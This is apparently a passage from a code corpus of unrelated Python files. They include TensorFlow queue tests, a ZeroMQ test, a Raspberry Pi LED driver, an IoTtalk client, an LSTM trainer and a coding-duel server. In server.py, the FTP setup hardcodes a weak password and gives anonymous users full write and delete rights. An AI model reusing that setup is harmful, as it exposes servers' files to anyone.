logging.debug(parsed_event.changed_properties)
# Inform all observers
self.inform_all(parsed_event)
def get_obs_for_event(self, evt):
"""
Get all observers for an event.
:param evt: Event to get observers for.
:return: List of observers.
:rtype: list[function]
"""
obs = set()
for t in type(evt).mro():
obs.update(self.observers.get(t, set()))
return obs
def add_observer(self, obs, evt_type):
"""
Add an observer for an event type.
:param obs: Function to call upon a new event of type evt_type.
:param evt_type: Event type to observe.
:type evt_type: TS3Event
"""
obs_set = self.observers.get(evt_type, set())
obs_set.add(obs)
self.observers[evt_type] = obs_set
def remove_observer(self, obs, evt_type):
"""
Remove an observer for an event type.
:param obs: Observer to remove.
:param evt_type: Event type to remove the observer from.
"""
self.observers.get(evt_type, set()).discard(obs)
def remove_observer_from_all(self, obs):
"""
Removes an observer from all event_types.
:param obs: Observer to remove.
"""
for evt_type in self.observers.keys():
self.remove_observer(obs, evt_type)
def inform_all(self, evt):
"""
Inform all observers registered to the event type of an event.
:param evt: Event to inform observers of.
"""
for o in self.get_obs_for_event(evt):
try:
threading.Thread(target=o(evt)).start()
except Exception:
EventHandler.logger.exception("Exception while informing " + str(o) + " of Event of type " +
str(type(evt)) + "\nOriginal data:" + str(evt.data))
|
client_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for client.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import platform
import sys
import threading
import time
from tensorflow.python.distribute.client import client
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import def_function
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.util import nest
class CoordinatedClosureQueueTest(test.TestCase):
def testBasic(self):
queue = client._CoordinatedClosureQueue()
closure1 = self._create_closure(queue._cancellation_mgr)
queue.put(closure1)
self.assertIs(closure1, queue.get())
self.assertFalse(queue.done())
queue.put_back(closure1)
self.assertEqual(closure1, queue.get())
queue.mark_finished()
self.assertTrue(queue.done())
queue.wait()
def testProcessAtLeaseOnce(self):
closure_queue = client._CoordinatedClosureQueue()
labels = ['A', 'B', 'C', 'D', 'E']
processed_count = collections.defaultdict(int)
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
has_been_put_back = False
while True:
closure = closure_queue.get(timeout=30)
if closure is None:
break
if not has_been_put_back:
has_been_put_back = True
closure_queue.put_back(closure)
continue
closure._function()
closure_queue.mark_finished()
def get_func(label):
def func():
time.sleep(3)
processed_count[label] += 1
return func
cm = cancellation.CancellationManager()
for label in labels:
closure_queue.put(client.Closure(get_func(label), cm))
t1 = threading.Thread(target=process_queue, daemon=True)
t1.start()
t2 = threading.Thread(target=process_queue, daemon=True)
t2.start()
# Make sure multiple wait() calls are fine.
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
self.assertEqual(processed_count, collections.Counter(labels))
coord.join([t1, t2])
def testNotifyBeforeWait(self):
closure_queue = client._CoordinatedClosureQueue()
def func():
logging.info('func running')
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
closure_queue.get()
closure_queue.mark_finished()
closure_queue.put(client.Closure(func, closure_queue._cancellation_mgr))
t = threading.Thread(target=process_queue)
t.start()
coord.join([t])
# This test asserts that waiting at the time the function has been processed
# doesn't time out.
closure_queue.wait()
def _assert_one_unblock_the_other(self, first_fn, second_fn):
"""Asserts `second_fn` wouldn't return before `first_fn` is finished."""
first_fn_done = threading.Event()
second_fn_done = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def wrapped_first_fn():
with coord.stop_on_exception():
self.assertFalse(second_fn_done.is_set())
first_fn()
first_fn_done.set()
self.assertFalse(first_fn_done.is_set())
t = threading.Thread(target=wrapped_first_fn)
t.start()
second_fn()
self.assertTrue(first_fn_done.is_set())
second_fn_done.set()
coord.join([t])
def testWaitRaiseErrorAfterMarkFailure(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue = client._CoordinatedClosureQueue()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure = closure_queue.get()
wait_finish_event = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
# Using a thread to verify that closure_queue.wait() will not return until
# all inflight closures are finished.
def mark_finished_fn():
try:
raise ValueError('Some error.')
except ValueError as e:
closure_queue.mark_failed(e)
def wait_fn():
with self.assertRaises(ValueError):
closure_queue.wait()
self._assert_one_unblock_the_other(mark_finished_fn, wait_fn)
self.assertTrue(closure_queue.done())
def _create_closure(self, cancellation_mgr):
@def_function.function()
def some_function():
return 1.0
return client.Closure(some_function, cancellation_mgr)
def _put_two_closures_and_get_one(self):
closure_queue = client._CoordinatedClosureQueue()
closure1 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure1)
closure2 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure2)
closure_got = closure_queue.get() # returns closure1
self.assertIs(closure_got, closure1)
self.assertIsNot(closure_got, closure2)
return closure_queue, closure1, closure2
def testPutRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
client.FunctionRetryableError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2._fetch_output_remote_values()
# The error is cleared.
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
def testWaitRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.wait()
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
client.FunctionRetryableError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2._fetch_output_remote_values()
# The error is cleared.
closure_queue.wait()
def testDoneRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertFalse(closure_queue.done())
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.done()
def _set_error(self, closure_queue, closure, error):
try:
raise error
except Exception as e: # pylint: disable=broad-except
nest.map_structure(lambda x: x._set_error(e),
closure._output_remote_values)
closure_queue.mark_failed(e)
def _test_cancel_closure_when_error(self, call_wait):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, closure1, closure2 = self._put_two_closures_and_get_one()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure_queue.get()
# At this moment, there are two inflight, one in queue.
self.assertEqual(closure_queue._inflight_closure_count, 2)
# Hold a copy of the queue's cancellation manager at this point
initial_cm = closure_queue._cancellation_mgr
# Simulating closure1 fails.
self._set_error(closure_queue, closure1, ValueError('Some error.'))
# At this moment, there are one inflight, one in queue.
self.assertEqual(closure_queue._queue.qsize(), 1)
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure3 = self._create_closure(closure_queue._cancellation_mgr)
def fake_cancellation():
self._set_error(closure_queue, closure2,
ValueError('Fake cancellation error.'))
def report_error():
# It should not report the fake cancellation error.
with self.assertRaisesRegex(ValueError, 'Some error.'):
# Verifying `wait()` or `put()` raises even if one closure is in
# flight.
if call_wait:
closure_queue.wait()
else:
closure_queue.put(closure3)
self._assert_one_unblock_the_other(fake_cancellation, report_error)
# The original cancellation manager of the queue has been cancelled.
self.assertTrue(initial_cm.is_cancelled)
# At this moment, there is zero inflight, nothing in queue.
self.assertTrue(closure_queue._queue.empty())
self.assertEqual(closure_queue._inflight_closure_count, 0)
self.assertIsNone(closure_queue._error)
# This asserts that closure1 has errored.
with self.assertRaisesRegex(ValueError, 'Some error.'):
closure1._fetch_output_remote_values()
# The following asserts that closure3 should have been cancelled.
if not call_wait:
with self.assertRaisesRegex(
client.FunctionRetryableError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure3._fetch_output_remote_values()
# Closure2 was an inflight closure when it got cancelled.
self.assertEqual(closure2._output_remote_values._status,
client._RemoteValueStatus.READY)
with self.assertRaisesRegex(ValueError, 'Fake cancellation error.'):
closure2._fetch_output_remote_values()
# This asserts that the queue has a clear state.
self.testBasic()
def testWaitRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=True)
def testPutRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=False)
def testStateIsRestoredAfterJoinIsCalled(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure_queue.mark_failed(ValueError('test error'))
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
# Its error should have been cleared.
self.assertIsNone(closure_queue._error)
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertIsNone(closure_queue._error)
def testThreadSafey(self):
thread_count = 10
queue = client._CoordinatedClosureQueue()
# Each thread performs 20 queue actions: 10 are `put_back` and 10 are
# `mark_finished`.
action_count = 20
def func():
for i in range(action_count):
closure = queue.get()
if i % 2 == 0:
queue.put_back(closure)
else:
queue.mark_finished()
threads = [threading.Thread(target=func) for i in range(thread_count)]
for t in threads:
t.start()
for _ in range(thread_count * action_count // 2):
queue.put(self._create_closure(queue._cancellation_mgr))
queue.wait()
self.assertTrue(queue.done())
if __name__ == '__main__':
test.main()
|
test_RHW.py
|
import zmq
adr = 'tcp://127.0.0.1:6001'
context = zmq.Context()
pub = context.socket(zmq.PUB)
pub.setsockopt_unicode(zmq.IDENTITY, 'publisher')
pub.bind(adr)
sub = context.socket(zmq.SUB)
poller = zmq.Poller()
poller.register(sub, zmq.POLLIN)
sub.setsockopt(zmq.SUBSCRIBE, b"")
sub.set_hwm(1)
#sub.setsockopt(zmq.RCVHWM, 1)
sub.connect(adr)
from threading import Thread
from time import sleep
def send_pub(pub):
i = 0
while True:
i += 1
pub.send_multipart([b'msg', str(i).encode('utf-8')])
print(f'publishing msg_i = {i}')
sleep(0.3)
t = Thread(target=send_pub, args=[pub])
t.start()
n = 0
sleeped = False
while True:
n += 1
print(f'n={n}')
if n > 10 and not sleeped:
sleeped = True
print('sleeping')
sleep(1)
sockets = dict(poller.poll(300))
if sub in sockets:
data = sub.recv_multipart()
print(f'recived {data}')
|
_led.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""LED driver for the VoiceHat."""
import itertools
import threading
import time
import RPi.GPIO as GPIO
class LED:
"""Starts a background thread to show patterns with the LED.
Simple usage:
my_led = LED(channel = 25)
my_led.start()
my_led.set_state(LED.BEACON)
my_led.stop()
"""
OFF = 0
ON = 1
BLINK = 2
BLINK_3 = 3
BEACON = 4
BEACON_DARK = 5
DECAY = 6
PULSE_SLOW = 7
PULSE_QUICK = 8
def __init__(self, channel):
self.animator = threading.Thread(target=self._animate, daemon=True)
self.channel = channel
self.iterator = None
self.running = False
self.state = None
self.sleep = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(channel, GPIO.OUT)
self.pwm = GPIO.PWM(channel, 100)
self.lock = threading.Lock()
def __del__(self):
self.stop()
GPIO.cleanup(self.channel)
def start(self):
"""Start the LED driver."""
with self.lock: # pylint: disable=E1129
if not self.running:
self.running = True
self.pwm.start(0) # off by default
self.animator.start()
def stop(self):
"""Stop the LED driver and sets the LED to off."""
with self.lock: # pylint: disable=E1129
if self.running:
self.running = False
self.animator.join()
self.pwm.stop()
def set_state(self, state):
"""Set the LED driver's new state.
Note the LED driver must be started for this to have any effect.
"""
with self.lock: # pylint: disable=E1129
self.state = state
def _animate(self):
while True:
state = None
running = False
with self.lock: # pylint: disable=E1129
state = self.state
self.state = None
running = self.running
if not running:
return
if state:
if not self._parse_state(state):
raise ValueError('unsupported state: %d' % state)
if self.iterator:
self.pwm.ChangeDutyCycle(next(self.iterator))
time.sleep(self.sleep)
else:
# We can also wait for a state change here with a Condition.
time.sleep(1)
def _parse_state(self, state):
self.iterator = None
self.sleep = 0.0
handled = False
if state == self.OFF:
self.pwm.ChangeDutyCycle(0)
handled = True
elif state == self.ON:
self.pwm.ChangeDutyCycle(100)
handled = True
elif state == self.BLINK:
self.iterator = itertools.cycle([0, 100])
self.sleep = 0.5
handled = True
elif state == self.BLINK_3:
self.iterator = itertools.cycle([0, 100] * 3 + [0, 0])
self.sleep = 0.25
handled = True
elif state == self.BEACON:
self.iterator = itertools.cycle(
itertools.chain([30] * 100, [100] * 8, range(100, 30, -5)))
self.sleep = 0.05
handled = True
elif state == self.BEACON_DARK:
self.iterator = itertools.cycle(
itertools.chain([0] * 100, range(0, 30, 3), range(30, 0, -3)))
self.sleep = 0.05
handled = True
elif state == self.DECAY:
self.iterator = itertools.cycle(range(100, 0, -2))
self.sleep = 0.05
handled = True
elif state == self.PULSE_SLOW:
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 2), range(100, 0, -2)))
self.sleep = 0.1
handled = True
elif state == self.PULSE_QUICK:
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 5), range(100, 0, -5)))
self.sleep = 0.05
handled = True
return handled
|
DAN.py
|
import requests, time, csmapi, random, threading
# example
profile = {
'd_name': None,
'dm_name': 'MorSensor',
'u_name': 'yb',
'is_sim': False,
'df_list': ['Acceleration', 'Temperature'],
}
mac_addr = 'C860008BD249'
state = 'SUSPEND' #for control channel
#state = 'RESUME'
SelectedDF = []
control_channel_timestamp = None
def ControlChannel():
global state, SelectedDF, control_channel_timestamp
NewSession=requests.Session()
while True:
time.sleep(2)
try:
CH = csmapi.pull(MAC,'__Ctl_O__', NewSession)
if CH != []:
if control_channel_timestamp == CH[0][0]: continue
control_channel_timestamp = CH[0][0]
state = CH[0][1][0]
if state == 'SET_DF_STATUS' :
csmapi.push(MAC,'__Ctl_I__',['SET_DF_STATUS_RSP',{'cmd_params':CH[0][1][1]['cmd_params']}], NewSession)
DF_STATUS = list(CH[0][1][1]['cmd_params'][0])
SelectedDF = []
index=0
for STATUS in DF_STATUS:
if STATUS == '1':
SelectedDF.append(profile['df_list'][index])
index=index+1
except Exception as e:
print ('Control error:', e)
if str(e).find('mac_addr not found:') != -1:
print('Reg_addr is not found. Try to re-register...')
device_registration_with_retry()
else:
print('Connection failed due to unknow reasons.')
time.sleep(1)
def get_mac_addr():
from uuid import getnode
mac = getnode()
mac = ''.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
return mac
def detect_local_ec():
EASYCONNECT_HOST=None
import socket
UDP_IP = ''
UDP_PORT = 17000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((UDP_IP, UDP_PORT))
while EASYCONNECT_HOST==None:
print ('Searching for the IoTtalk server...')
data, addr = s.recvfrom(1024)
if str(data.decode()) == 'easyconnect':
EASYCONNECT_HOST = 'http://{}:9999'.format(addr[0])
csmapi.ENDPOINT=EASYCONNECT_HOST
#print('IoTtalk server = {}'.format(csmapi.ENDPOINT))
timestamp={}
MAC=get_mac_addr()
thx=None
def register_device(addr):
global MAC, profile, timestamp, thx
if csmapi.ENDPOINT == None: detect_local_ec()
if addr != None: MAC = addr
if profile['d_name'] == None: profile['d_name']= str(int(random.uniform(1, 100)))+'.'+ profile['dm_name']
for i in profile['df_list']: timestamp[i] = ''
print('IoTtalk Server = {}'.format(csmapi.ENDPOINT))
if csmapi.register(MAC,profile):
print ('This device has successfully registered.')
print ('Device name = ' + profile['d_name'])
if thx == None:
print ('Create control threading')
thx=threading.Thread(target=ControlChannel) #for control channel
thx.daemon = True #for control channel
thx.start() #for control channel
return True
else:
print ('Registration failed.')
return False
def device_registration_with_retry(URL=None, addr=None):
if URL != None:
csmapi.ENDPOINT = URL
success = False
while not success:
try:
register_device(addr)
success = True
except Exception as e:
print ('Attach failed: '),
print (e)
time.sleep(1)
def pull(FEATURE_NAME):
global timestamp
if state == 'RESUME': data = csmapi.pull(MAC,FEATURE_NAME)
else: data = []
if data != []:
if timestamp[FEATURE_NAME] == data[0][0]:
return None
timestamp[FEATURE_NAME] = data[0][0]
if data[0][1] != []:
return data[0][1]
else: return None
else:
return None
def push(FEATURE_NAME, *data):
if state == 'RESUME':
return csmapi.push(MAC, FEATURE_NAME, list(data))
else: return None
def get_alias(FEATURE_NAME):
try:
alias = csmapi.get_alias(MAC,FEATURE_NAME)
except Exception as e:
#print (e)
return None
else:
return alias
def set_alias(FEATURE_NAME, alias):
try:
alias = csmapi.set_alias(MAC, FEATURE_NAME, alias)
except Exception as e:
#print (e)
return None
else:
return alias
def deregister():
return csmapi.deregister(MAC)
|
server.py
|
# lsof -n -i4TCP:32757 | grep LISTEN | awk '{ print $2 }' | xargs kill
import socket
from contextlib import suppress
with suppress(Exception):
from Server import runtime
from Server import database
with suppress(Exception):
import runtime
import database
import threading
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
class Server:
def __init__(self, database, client_conn, c_id, specs):
self.c_id = c_id
self.database = database
self.client_conn = client_conn
self.specs = specs
def ftp_service(self):
username = 'ajay'
port = 12345
authorizer = DummyAuthorizer()
authorizer.add_user(username, port, "/users/ajayraj", perm="elradfmw")
authorizer.add_anonymous("/users/ajayraj/", perm="elradfmw")
handler = FTPHandler
handler.authorizer = authorizer
ftp_server = FTPServer(("", 1026), handler)
ftp_server.serve_forever()
def separate_dir_file(self, filepath):
separator = '/'
dir_list = filepath.split(separator)
self.dir = separator.join(dir_list[:-1])
self.file = dir_list[-1]
def client_service(self):
print('TEST')
try:
self.separate_dir_file(self.specs)
src_path = self.database.get_directory_path('src')
test_path = self.database.get_directory_path('test')
filename, extension = self.file.split('.')
p_id = self.database.get_pid(filename)
test_file_names = self.database.get_test_filenames(p_id)
run = runtime.Run_Tests(self.c_id, self.file, src_path, test_path, test_file_names)
test_run_status = run.run_tests()
self.client_conn.send(test_run_status.encode())
duel_id = self.database.get_duel_id(self.c_id)
print('\n\n')
print('Duel ID:', duel_id)
print('Contestant ID:', self.c_id)
print('Test Run:', test_run_status)
print('\n\n')
except TypeError as te:
print('WRONG FILE TYPE | c_id:', self.c_id)
with suppress(Exception):
self.client_conn.send('FILE TYPE NOT SUPPORTED'.encode())
except Exception as e:
print(e)
print('EXCEPTION RAISED WHILE RUNNING TESTS | c_id:', self.c_id)
with suppress(Exception):
self.client_conn.send('UNEXPECTED ERROR. CONTACT ADMIN'.encode())
def duel_scores(self):
print('SCORE', self.c_id)
try:
opponent_id = self.database.get_opponent_id(self.c_id)
contestant_name = self.database.get_contestant_name(self.c_id)
opponent_name = self.database.get_contestant_name(opponent_id)
contestant_score = 0 if self.database.get_score(self.c_id) is None else self.database.get_score(self.c_id)
opponent_score = 0 if self.database.get_score(opponent_id) is None else self.database.get_score(opponent_id)
message = contestant_name + ' -> ' + str(contestant_score) + '\n' + opponent_name + ' -> ' + str(opponent_score)
self.client_conn.send(message.encode())
except Exception as e:
print(e)
print('ERROR IN RETRIEVING SCORES', self.c_id)
def validate_login(self):
print('LOGIN', self.c_id)
try:
if self.database.validate_login(self.c_id, specs):
message = 'success'
else:
message = 'fail'
self.client_conn.send(message.encode())
print(message)
except Exception as e:
print(e)
print('EXCEPTION RAISED IN LOGIN')
def __del__(self):
with suppress(Exception):
self.client_conn.close()
hostname, port = '', 32757
server = socket.socket()
server.bind((hostname, port))
server.listen(10)
ftp_server = Server(None, None, None, None)
ftp_service_thread = threading.Thread(target=ftp_server.ftp_service)
ftp_service_thread.start()
while True:
conn, addr = server.accept()
received_message = conn.recv(port).decode()
try:
action, c_id, specs = received_message.split(',')
codeduel_db = database.CodeDuel_Database()
server_interface = Server(codeduel_db, conn, c_id, specs)
if action == 'score':
duel_scores_thread = threading.Thread(target=server_interface.duel_scores)
duel_scores_thread.start()
elif action == 'test':
client_service_thread = threading.Thread(target=server_interface.client_service)
client_service_thread.start()
elif action == 'validate':
validate_thread = threading.Thread(target=server_interface.validate_login)
validate_thread.start()
except:
conn.close()
|
learn.py
|
#!/usr/bin/env python3
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'lib'))
from support import Database, Config
import numpy as np
import queue, math, socket, subprocess, support, threading
import tensorflow as tf
class Learn:
def __init__(self, config):
graph = tf.Graph()
with graph.as_default():
model = Model(config)
with tf.variable_scope('optimization'):
epoch = tf.Variable(0, name='epoch', trainable=False)
increment_epoch = epoch.assign_add(1)
parameters = tf.trainable_variables()
gradient = tf.gradients(model.loss, parameters)
gradient, _ = tf.clip_by_global_norm(gradient, config.gradient_clip)
optimizer = tf.train.AdamOptimizer(config.learning_rate)
train = optimizer.apply_gradients(zip(gradient, parameters))
with tf.variable_scope('summary'):
tf.scalar_summary('log_loss', tf.log(tf.reduce_sum(model.loss)))
logger = tf.train.SummaryWriter(config.log_path, graph)
summary = tf.merge_all_summaries()
initialize = tf.initialize_variables(tf.all_variables(), name='initialize')
saver = Saver(config)
self.graph = graph
self.model = model
self.epoch = epoch
self.increment_epoch = increment_epoch
self.parameters = parameters
self.train = train
self.logger = logger
self.summary = summary
self.initialize = initialize
self.saver = saver
def count_parameters(self):
return np.sum([int(np.prod(parameter.get_shape())) for parameter in self.parameters])
def run(self, target, monitor, config):
print('Parameters: %d' % self.count_parameters())
print('Samples: %d' % target.sample_count)
session = tf.Session(graph=self.graph)
session.run(self.initialize)
self.saver.restore(session)
epoch = session.run(self.epoch)
epoch_count = config.epoch_count - epoch % config.epoch_count
for e in range(epoch, epoch + epoch_count):
self._run_epoch(target, monitor, config, session, e)
assert(session.run(self.increment_epoch) == e + 1)
self.saver.save(session)
def _run_epoch(self, target, monitor, config, session, e):
for s in range(target.sample_count):
t = e*target.sample_count + s
if monitor.should_train(t):
self._run_train(target, monitor, config, session, e, s, t)
if monitor.should_predict(t):
self._run_predict(target, monitor, config, session, e, s, t)
def _run_train(self, target, monitor, config, session, e, s, t):
sample = target.compute(s)
feed = {
self.model.start: self._zero_start(),
self.model.x: np.reshape(sample, [1, -1, target.dimension_count]),
self.model.y: np.reshape(support.shift(sample, -1), [1, -1, target.dimension_count]),
}
fetch = {'train': self.train, 'loss': self.model.loss, 'summary': self.summary}
result = session.run(fetch, feed)
loss = result['loss'].flatten()
assert(np.all([not math.isnan(loss) for loss in loss]))
monitor.train((e, s, t), loss)
self.logger.add_summary(result['summary'], t)
def _run_predict(self, target, monitor, config, session, e, s, t):
sample = target.compute((s + 1) % target.sample_count)
step_count = sample.shape[0]
feed = {self.model.start: self._zero_start()}
fetch = {'y_hat': self.model.y_hat, 'finish': self.model.finish}
for i in range(step_count):
feed[self.model.x] = np.reshape(sample[:(i + 1), :], [1, i + 1, -1])
y_hat = np.zeros([step_count, target.dimension_count])
for j in range(step_count - i - 1):
result = session.run(fetch, feed)
feed[self.model.start] = result['finish']
y_hat[j, :] = result['y_hat'][-1, :]
feed[self.model.x] = np.reshape(y_hat[j, :], [1, 1, -1])
if not monitor.predict(support.shift(sample, -i - 1), y_hat):
break
def _zero_start(self):
return np.zeros(self.model.start.get_shape(), np.float32)
class Model:
def __init__(self, config):
x = tf.placeholder(tf.float32, [1, None, config.dimension_count], name='x')
y = tf.placeholder(tf.float32, [1, None, config.dimension_count], name='y')
with tf.variable_scope('network') as scope:
cell = tf.nn.rnn_cell.LSTMCell(config.unit_count,
state_is_tuple=True,
cell_clip=config.cell_clip,
forget_bias=config.forget_bias,
use_peepholes=config.use_peepholes,
initializer=config.network_initializer)
cell = tf.nn.rnn_cell.MultiRNNCell([cell] * config.layer_count, state_is_tuple=True)
start, state = Model._initialize(config)
h, state = tf.nn.dynamic_rnn(cell, x, initial_state=state, parallel_iterations=1)
finish = Model._finalize(state, config)
y_hat, loss = Model._regress(h, y, config)
self.x = x
self.y = y
self.y_hat = y_hat
self.loss = loss
self.start = start
self.finish = finish
def _finalize(state, config):
parts = []
for i in range(config.layer_count):
parts.append(state[i].c)
parts.append(state[i].h)
return tf.pack(parts, name='finish')
def _initialize(config):
start = tf.placeholder(tf.float32, [2 * config.layer_count, 1, config.unit_count],
name='start')
parts = tf.unpack(start)
state = []
for i in range(config.layer_count):
c, h = parts[2 * i], parts[2*i + 1]
state.append(tf.nn.rnn_cell.LSTMStateTuple(c, h))
return start, tuple(state)
def _regress(x, y, config):
with tf.variable_scope('regression') as scope:
unroll_count = tf.shape(x)[1]
x = tf.squeeze(x, squeeze_dims=[0])
y = tf.squeeze(y, squeeze_dims=[0])
w = tf.get_variable('w', [config.unit_count, config.dimension_count],
initializer=config.regression_initializer)
b = tf.get_variable('b', [1, config.dimension_count])
y_hat = tf.matmul(x, w) + tf.tile(b, [unroll_count, 1])
loss = tf.reduce_mean(tf.squared_difference(y_hat, y))
return y_hat, loss
class Monitor:
def __init__(self, config):
self.bind_address = config.bind_address
self.work_schedule = np.cumsum(config.work_schedule)
self.channels = {}
self.lock = threading.Lock()
threading.Thread(target=self._predict_server, daemon=True).start()
def should_train(self, t):
return True
def should_predict(self, t):
return (len(self.channels) > 0 and
np.nonzero(self.work_schedule >= (t % self.work_schedule[-1]))[0][0] % 2 == 1)
def train(self, progress, loss):
sys.stdout.write('%4d %10d %10d' % progress)
[sys.stdout.write(' %12.4e' % loss) for loss in loss]
sys.stdout.write('\n')
def predict(self, y, y_hat):
self.lock.acquire()
try:
for channel in self.channels:
channel.put((y, y_hat))
finally:
self.lock.release()
return len(self.channels) > 0
def _predict_client(self, connection, address):
print('Start serving {}.'.format(address))
channel = queue.Queue()
self.lock.acquire()
try:
self.channels[channel] = True
finally:
self.lock.release()
try:
client = connection.makefile(mode="w")
while True:
y, y_hat = channel.get()
client.write(','.join([str(value) for value in y.flatten()]) + ',')
client.write(','.join([str(value) for value in y_hat.flatten()]) + '\n')
except Exception as e:
print('Stop serving {} ({}).'.format(address, e))
self.lock.acquire()
try:
del self.channels[channel]
finally:
self.lock.release()
def _predict_server(self):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(self.bind_address)
server.listen(1)
print('Listening to {}...'.format(self.bind_address))
while True:
try:
connection, address = server.accept()
threading.Thread(target=self._predict_client, daemon=True,
args=(connection, address)).start()
except Exception as e:
print('Encountered a problem ({}).'.format(e))
class Saver:
def __init__(self, config):
self.backend = tf.train.Saver()
self.path = config.save_path
def save(self, session):
path = self.backend.save(session, self.path)
print('Saved the model in "{}".'.format(path))
def restore(self, session):
if os.path.isfile(self.path):
if input('Found a model in "{}". Restore? '.format(self.path)) != 'no':
self.backend.restore(session, self.path)
print('Restored. Continue learning...')
class Target:
def __init__(self, config):
database = Database(config)
data = database.read()[:, 0]
partition = database.partition()
sample_count = partition.shape[0]
samples, stack = {}, []
for k in range(sample_count):
i, j = partition[k]
samples[k] = data[i:j]
stack.append(samples[k])
data = np.concatenate(stack)
offset, scale = np.mean(data), np.std(data)
for k in range(sample_count):
samples[k] = np.reshape((samples[k] - offset) / scale, [-1, 1])
self.dimension_count = 1
self.sample_count = sample_count
self.samples = samples
def compute(self, k):
return self.samples[k]
class TestTarget:
def __init__(self, config):
self.dimension_count = 1
self.sample_count = 100000
def compute(self, k):
return np.reshape(np.sin(4 * np.pi / 40 * np.arange(0, 40)), [-1, 1])
def main(config):
learn = Learn(config)
target = Target(config)
monitor = Monitor(config)
learn.run(target, monitor, config)
if __name__ == '__main__':
database_path = Database.find()
output_path = os.path.dirname(database_path)
name = os.path.basename(database_path).replace('.sqlite3', '')
config = Config({
'dimension_count': 1,
'database_path': database_path,
'layer_count': 1,
'unit_count': 200,
'cell_clip': 1.0,
'forget_bias': 1.0,
'use_peepholes': True,
'network_initializer': tf.random_uniform_initializer(-0.01, 0.01),
'regression_initializer': tf.random_normal_initializer(stddev=0.01),
'learning_rate': 1e-3,
'gradient_clip': 1.0,
'epoch_count': 100,
'log_path': os.path.join(output_path, 'log'),
'save_path': os.path.join(output_path, '{}.model'.format(name)),
'bind_address': ('0.0.0.0', 4242),
'work_schedule': [1000 - 10, 10],
})
main(config)
|
notebookapp.py
|
# coding: utf-8
"""A tornado based IPython notebook server.
Authors:
* Brian Granger
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
#
